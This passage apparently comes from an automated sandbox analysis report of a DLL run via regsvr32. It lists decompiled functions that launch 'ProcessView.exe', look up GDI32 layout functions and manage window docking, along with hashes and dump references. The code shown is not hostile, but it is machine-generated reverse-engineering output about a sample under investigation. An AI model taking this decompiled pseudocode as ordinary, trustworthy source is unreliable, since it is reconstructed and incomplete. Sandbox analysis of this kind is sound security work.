				E1003BB70(__edi,  &_v68, 0, 0x44);
				_v68.cb = 0x44;
				if(CreateProcessA(0, "ProcessView.exe", 0, 0, 1, 8, 0, 0,  &_v68,  &_v84) == 0) {
					return E10018B24(_t17, 0x10058008, 0, 0);
				} else {
					return WaitForSingleObject(_v84, 0xffffffff);
				}
			}






                                                                                                                0x1000b24d
                                                                                                                0x1000b24f
                                                                                                                0x1000b274
                                                                                                                0x1000b284
                                                                                                                0x1000b2ac
                                                                                                                0x1000b286
                                                                                                                0x1000b297
                                                                                                                0x1000b297

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1000B24F
                                                                                                                • CreateProcessA.KERNEL32 ref: 1000B27C
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000B28D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObjectProcessSingleWait_memset
                                                                                                                • String ID: D$ProcessView.exe
                                                                                                                • API String ID: 288585173-1757985642
                                                                                                                • Opcode ID: fa07df7b5a9862bcb48e3c1edbb2c3201dc83e5488c38767f15664d2f9243538
                                                                                                                • Instruction ID: cf2dc463d70a2e16d58366621b96bc61bac375d13409f33c490884f4da629055
                                                                                                                • Opcode Fuzzy Hash: fa07df7b5a9862bcb48e3c1edbb2c3201dc83e5488c38767f15664d2f9243538
                                                                                                                • Instruction Fuzzy Hash: CEF09AB12843107AF264DB148C87FCB37A5AB85F50F904508F745AE1C0EBF5E60C878A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10023E8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10023E8C(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                                                                0x10023e93
                                                                                                                0x10023e95
                                                                                                                0x10023ea1
                                                                                                                0x10023ea3
                                                                                                                0x10023eab
                                                                                                                0x10023ebe
                                                                                                                0x10023ec2
                                                                                                                0x10023ec5
                                                                                                                0x10023ec5
                                                                                                                0x10023ead
                                                                                                                0x10023eb6
                                                                                                                0x10023eb6
                                                                                                                0x10023ecf

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1003A169,00000000), ref: 10023E95
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1003A169,00000000), ref: 10023EA3
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,1003A169,00000000), ref: 10023EC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$SetLayout
                                                                                                                • API String ID: 4275029093-2147214759
                                                                                                                • Opcode ID: a8382d7f1f37330da1796f59796bdd5d8c41d223a18a8ba9b34e90e1786fdbf0
                                                                                                                • Instruction ID: ad81cc4bcf626707de2ed7daadfe46b2e2437c35453d77d6f97349e8d1b0081d
                                                                                                                • Opcode Fuzzy Hash: a8382d7f1f37330da1796f59796bdd5d8c41d223a18a8ba9b34e90e1786fdbf0
                                                                                                                • Instruction Fuzzy Hash: A7E04F32504514ABDB61A725AC4C85F7BA2EBC8772756CA26F675C20E0CB3188498B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10023E56 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10023E56(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                                                                0x10023e5c
                                                                                                                0x10023e6a
                                                                                                                0x10023e72
                                                                                                                0x10023e7f
                                                                                                                0x10023e82
                                                                                                                0x10023e74
                                                                                                                0x10023e79
                                                                                                                0x10023e79
                                                                                                                0x10023e8b

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,1003A15C), ref: 10023E5E
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10023E6A
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 10023E82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$GetLayout
                                                                                                                • API String ID: 4275029093-2396518106
                                                                                                                • Opcode ID: e174fa2591516e2392b9f2d874f0bea4d04c8c2b3fae3cbe14be5c4ea432d4e1
                                                                                                                • Instruction ID: 033f20c47d496fe00651347abdbe6ae7a7e14d50a9bdf03d85af1cf620874e74
                                                                                                                • Opcode Fuzzy Hash: e174fa2591516e2392b9f2d874f0bea4d04c8c2b3fae3cbe14be5c4ea432d4e1
                                                                                                                • Instruction Fuzzy Hash: EED05B3290063467DB5057747C4C9577B94DB086713064665FD35D31E0DF30DD08C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10038B31 Relevance: 7.7, APIs: 5, Instructions: 214windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E10038B31(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed char _t81;
				signed int _t86;
				signed int _t91;
				signed int _t93;
				signed int _t101;
				signed int _t117;
				intOrPtr _t131;
				void* _t132;
				intOrPtr _t139;
				void* _t153;
				signed int _t157;
				void* _t158;
				intOrPtr _t161;
				void* _t162;
				signed int _t164;
				void* _t166;

				_t153 = __edx;
				_t133 = __ecx;
				_t164 = _t166 - 0xb8;
				_t73 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t164 + 0xb4) = _t73 ^ _t164;
				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
				_t131 = __ecx;
				_t170 = __ecx;
				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
				if(__ecx == 0) {
					L1:
					E1001729E(_t131, _t133, 0, _t161, _t170);
				}
				if(_t161 == 0) {
					goto L1;
				}
				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
					}
					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
					_t178 = _t81 & 0x00000040;
					 *(_t131 + 0x80) = _t81;
					if((_t81 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t164 - 0x50);
						E1001D878(_t131, _t161, _t153, 0, _t161, _t178);
						E1002D750(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
					}
					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
						_t87 = _t86 & 0xfffffffe;
						__eflags = _t86 & 0xfffffffe;
					} else {
						_t87 = _t86 | 0x00000001;
					}
					E10035BBE(_t161, _t87);
					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
						E1001D569(_t161, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
					}
					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
					if( *(_t164 - 0x54) == 0) {
						_t60 = _t131 + 0x98; // 0x98
						_t156 = _t60;
						E1001F82B(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
						E1001F82B(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
						_t91 =  *0x10070c84; // 0x2
						_t157 = 0;
						__eflags = 0;
						_t93 =  *0x10070c80; // 0x2
						_t138 = _t161;
						E1001D569(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
					} else {
						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
						E10024274(_t131, _t164 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
						_push( *((intOrPtr*)(_t164 - 0x58)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t117 = E1003881C(_t131);
						_t138 =  *((intOrPtr*)(_t164 - 0x58));
						 *(_t164 - 0x70) = _t117;
						E1001D569( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
						_t161 =  *((intOrPtr*)(_t164 - 0x58));
						_t157 = 0;
					}
					if(E10019C16(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
						E100387A2(_t161, _t131);
					}
					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
					if(_t139 != _t131) {
						__eflags = _t139 - _t157;
						if(_t139 != _t157) {
							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
								L28:
								_t101 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
									goto L28;
								} else {
									_t101 = 1;
								}
							}
							_push(_t101);
							_push(0xffffffff);
							goto L30;
						}
					} else {
						_push(_t157);
						_push( *(_t164 - 0x70));
						L30:
						_push(_t161);
						E100389FA(_t139, _t157);
					}
					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
						E1001D569(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
					}
					E10038993(_t131, _t131, _t164, _t161);
					 *(E10035A2F(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
				}
				_pop(_t158);
				_pop(_t162);
				_pop(_t132);
				return E1003B437(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
			}
























                                                                                                                0x10038b31
                                                                                                                0x10038b31
                                                                                                                0x10038b32
                                                                                                                0x10038b3f
                                                                                                                0x10038b46
                                                                                                                0x10038b54
                                                                                                                0x10038b5b
                                                                                                                0x10038b5f
                                                                                                                0x10038b61
                                                                                                                0x10038b64
                                                                                                                0x10038b67
                                                                                                                0x10038b69
                                                                                                                0x10038b69
                                                                                                                0x10038b69
                                                                                                                0x10038b70
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038b79
                                                                                                                0x10038b85
                                                                                                                0x10038bab
                                                                                                                0x10038bb6
                                                                                                                0x10038bb6
                                                                                                                0x10038bbd
                                                                                                                0x10038bd3
                                                                                                                0x10038bd5
                                                                                                                0x10038bd7
                                                                                                                0x10038bdd
                                                                                                                0x10038bdf
                                                                                                                0x10038be7
                                                                                                                0x10038bea
                                                                                                                0x10038bf6
                                                                                                                0x10038bf6
                                                                                                                0x10038c12
                                                                                                                0x10038c1d
                                                                                                                0x10038c24
                                                                                                                0x10038c24
                                                                                                                0x10038c1f
                                                                                                                0x10038c1f
                                                                                                                0x10038c1f
                                                                                                                0x10038c2a
                                                                                                                0x10038c35
                                                                                                                0x10038c38
                                                                                                                0x10038c53
                                                                                                                0x10038c58
                                                                                                                0x10038c58
                                                                                                                0x10038c5f
                                                                                                                0x10038c66
                                                                                                                0x10038ce3
                                                                                                                0x10038ce3
                                                                                                                0x10038cef
                                                                                                                0x10038cfb
                                                                                                                0x10038d00
                                                                                                                0x10038d0a
                                                                                                                0x10038d0a
                                                                                                                0x10038d11
                                                                                                                0x10038d1a
                                                                                                                0x10038d1c
                                                                                                                0x10038c68
                                                                                                                0x10038c6f
                                                                                                                0x10038c7b
                                                                                                                0x10038c89
                                                                                                                0x10038c99
                                                                                                                0x10038ca1
                                                                                                                0x10038ca2
                                                                                                                0x10038ca8
                                                                                                                0x10038cab
                                                                                                                0x10038cac
                                                                                                                0x10038cad
                                                                                                                0x10038cb0
                                                                                                                0x10038cb1
                                                                                                                0x10038cb6
                                                                                                                0x10038cb9
                                                                                                                0x10038cd7
                                                                                                                0x10038cdc
                                                                                                                0x10038cdf
                                                                                                                0x10038cdf
                                                                                                                0x10038d32
                                                                                                                0x10038d37
                                                                                                                0x10038d37
                                                                                                                0x10038d3c
                                                                                                                0x10038d44
                                                                                                                0x10038d4c
                                                                                                                0x10038d4e
                                                                                                                0x10038d50
                                                                                                                0x10038d56
                                                                                                                0x10038d65
                                                                                                                0x10038d65
                                                                                                                0x10038d65
                                                                                                                0x10038d58
                                                                                                                0x10038d58
                                                                                                                0x10038d5e
                                                                                                                0x00000000
                                                                                                                0x10038d60
                                                                                                                0x10038d62
                                                                                                                0x10038d62
                                                                                                                0x10038d5e
                                                                                                                0x10038d67
                                                                                                                0x10038d68
                                                                                                                0x00000000
                                                                                                                0x10038d68
                                                                                                                0x10038d46
                                                                                                                0x10038d46
                                                                                                                0x10038d47
                                                                                                                0x10038d6a
                                                                                                                0x10038d6a
                                                                                                                0x10038d6b
                                                                                                                0x10038d6b
                                                                                                                0x10038d73
                                                                                                                0x10038d79
                                                                                                                0x10038d84
                                                                                                                0x10038d84
                                                                                                                0x10038d8c
                                                                                                                0x10038d98
                                                                                                                0x10038d98
                                                                                                                0x10038da5
                                                                                                                0x10038da6
                                                                                                                0x10038da9
                                                                                                                0x10038db6

                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 10038B79
                                                                                                                • EqualRect.USER32 ref: 10038B97
                                                                                                                • IsWindowVisible.USER32(?), ref: 10038C3D
                                                                                                                • CopyRect.USER32(?,?), ref: 10038C6F
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                  • Part of subcall function 1003881C: GetWindowRect.USER32 ref: 10038880
                                                                                                                  • Part of subcall function 1001D569: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,100197B3,?), ref: 1001D58F
                                                                                                                • GetParent.USER32(?), ref: 10038D24
                                                                                                                  • Part of subcall function 100387A2: SetParent.USER32(?,00000000), ref: 100387B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 388495236-0
                                                                                                                • Opcode ID: ed74ff252d5a82ab7c81688154af753055f34a0159d371e18ad7e48c8e7aaed9
                                                                                                                • Instruction ID: 4e1fd3bea64b962a28d7a9cb0a9681322e3091f941260babb80376738b62fef7
                                                                                                                • Opcode Fuzzy Hash: ed74ff252d5a82ab7c81688154af753055f34a0159d371e18ad7e48c8e7aaed9
                                                                                                                • Instruction Fuzzy Hash: AF718A71A007099FDF12DFA8CC81BAEB7B9FB44301F144669E55AEF195DB30AA44CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10038DB9 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 41%
                                                                                                                			E10038DB9(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				signed char _t68;
				signed int _t73;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				signed int _t120;
				void* _t137;
				RECT* _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t144;
				signed int _t146;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t114 = __ecx;
				_t146 = _t148 - 0xb0;
				_t149 = _t148 - 0x130;
				_t61 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t146 + 0xac) = _t61 ^ _t146;
				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
				_t139 =  *(_t146 + 0xbc);
				_t112 = __ecx;
				_t152 = __ecx;
				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
				 *(_t146 - 0x70) = _t139;
				if(__ecx == 0) {
					L1:
					E1001729E(_t112, _t114, _t139, _t143, _t152);
				}
				if(_t143 == 0) {
					goto L1;
				}
				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
					}
					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
					_t160 = _t68 & 0x00000040;
					 *(_t112 + 0x80) = _t68;
					if((_t68 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t146 - 0x58);
						E1001D878(_t112, _t143, _t137, _t139, _t143, _t160);
						E1002D750(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
					}
					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
						_t74 = _t73 & 0xfffffffe;
						__eflags = _t73 & 0xfffffffe;
					} else {
						_t74 = _t73 | 0x00000001;
					}
					E10035BBE(_t143, _t74);
					_push(0xffffffff);
					_t140 = E100387C0(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
					if(_t140 > 0) {
						 *((intOrPtr*)(E10011520(_t112, _t112 + 0x98, _t140, _t143, _t146, _t140))) = _t143;
					}
					if( *(_t146 - 0x70) == 0) {
						__eflags = _t140 - 1;
						if(_t140 < 1) {
							_t140 = _t112 + 0x98;
							E1001F82B(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
							E1001F82B(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
						}
						_t118 =  *0x10070c84; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t118);
						_t120 =  *0x10070c80; // 0x2
						_push( ~_t120);
						_push(0);
					} else {
						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
						E10024274(_t112, _t146 - 0x68);
						if(_t140 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
							_t140 = _t149 - 0x10;
							_push( *((intOrPtr*)(_t146 - 0x6c)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1003881C(_t112);
							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
						_push( *((intOrPtr*)(_t146 - 0x64)));
						_push( *(_t146 - 0x68));
						_push(0);
					}
					E1001D569(_t143);
					if(E10019C16(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
						E100387A2(_t143, _t112);
					}
					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
						E100389FA(_t123, _t140, _t143, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
					 *(E10035A2F(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
				}
				_pop(_t141);
				_pop(_t144);
				_pop(_t113);
				return E1003B437(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
			}






















                                                                                                                0x10038db9
                                                                                                                0x10038db9
                                                                                                                0x10038dba
                                                                                                                0x10038dc1
                                                                                                                0x10038dc7
                                                                                                                0x10038dce
                                                                                                                0x10038dd6
                                                                                                                0x10038ddd
                                                                                                                0x10038de3
                                                                                                                0x10038de5
                                                                                                                0x10038de7
                                                                                                                0x10038dea
                                                                                                                0x10038ded
                                                                                                                0x10038def
                                                                                                                0x10038def
                                                                                                                0x10038def
                                                                                                                0x10038df6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038dff
                                                                                                                0x10038e0b
                                                                                                                0x10038e2f
                                                                                                                0x10038e3a
                                                                                                                0x10038e3a
                                                                                                                0x10038e41
                                                                                                                0x10038e57
                                                                                                                0x10038e59
                                                                                                                0x10038e5b
                                                                                                                0x10038e61
                                                                                                                0x10038e63
                                                                                                                0x10038e6b
                                                                                                                0x10038e6e
                                                                                                                0x10038e7a
                                                                                                                0x10038e7a
                                                                                                                0x10038e96
                                                                                                                0x10038ea2
                                                                                                                0x10038ea9
                                                                                                                0x10038ea9
                                                                                                                0x10038ea4
                                                                                                                0x10038ea4
                                                                                                                0x10038ea4
                                                                                                                0x10038eaf
                                                                                                                0x10038eb4
                                                                                                                0x10038eca
                                                                                                                0x10038ece
                                                                                                                0x10038edc
                                                                                                                0x10038edc
                                                                                                                0x10038ee2
                                                                                                                0x10038f57
                                                                                                                0x10038f5a
                                                                                                                0x10038f5c
                                                                                                                0x10038f68
                                                                                                                0x10038f74
                                                                                                                0x10038f74
                                                                                                                0x10038f79
                                                                                                                0x10038f7f
                                                                                                                0x10038f84
                                                                                                                0x10038f86
                                                                                                                0x10038f87
                                                                                                                0x10038f8a
                                                                                                                0x10038f8b
                                                                                                                0x10038f93
                                                                                                                0x10038f94
                                                                                                                0x10038ee4
                                                                                                                0x10038eeb
                                                                                                                0x10038ef7
                                                                                                                0x10038eff
                                                                                                                0x10038f0a
                                                                                                                0x10038f1a
                                                                                                                0x10038f22
                                                                                                                0x10038f23
                                                                                                                0x10038f27
                                                                                                                0x10038f29
                                                                                                                0x10038f2c
                                                                                                                0x10038f2d
                                                                                                                0x10038f2e
                                                                                                                0x10038f31
                                                                                                                0x10038f32
                                                                                                                0x10038f37
                                                                                                                0x10038f37
                                                                                                                0x10038f40
                                                                                                                0x10038f45
                                                                                                                0x10038f4c
                                                                                                                0x10038f4d
                                                                                                                0x10038f50
                                                                                                                0x10038f53
                                                                                                                0x10038f53
                                                                                                                0x10038f97
                                                                                                                0x10038fad
                                                                                                                0x10038fb2
                                                                                                                0x10038fb2
                                                                                                                0x10038fb7
                                                                                                                0x10038fbf
                                                                                                                0x10038fc6
                                                                                                                0x10038fc6
                                                                                                                0x10038fcd
                                                                                                                0x10038fd8
                                                                                                                0x10038fd8
                                                                                                                0x10038fe5
                                                                                                                0x10038fe6
                                                                                                                0x10038fe9
                                                                                                                0x10038ff6

                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 10038DFF
                                                                                                                • EqualRect.USER32 ref: 10038E1A
                                                                                                                • GetDlgCtrlID.USER32 ref: 10038EB9
                                                                                                                • CopyRect.USER32(?,?), ref: 10038EEB
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                  • Part of subcall function 1003881C: GetWindowRect.USER32 ref: 10038880
                                                                                                                  • Part of subcall function 1001D569: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,100197B3,?), ref: 1001D58F
                                                                                                                • GetParent.USER32(?), ref: 10038F9F
                                                                                                                  • Part of subcall function 100387A2: SetParent.USER32(?,00000000), ref: 100387B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 964284190-0
                                                                                                                • Opcode ID: dccad42ae92f6f5b05f0c80e409acbdf06ff7fd4e95d2babd0cd76162e7c52a6
                                                                                                                • Instruction ID: 8abfab7fc1dea632dc0ce556bfa7ea42c41ffa266d980b6fd6dd8bdd91c69bf5
                                                                                                                • Opcode Fuzzy Hash: dccad42ae92f6f5b05f0c80e409acbdf06ff7fd4e95d2babd0cd76162e7c52a6
                                                                                                                • Instruction Fuzzy Hash: C861AE75A007059FDB16DFA8CC81BAEB7BAFF48301F004669E95ADF191DB30A945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

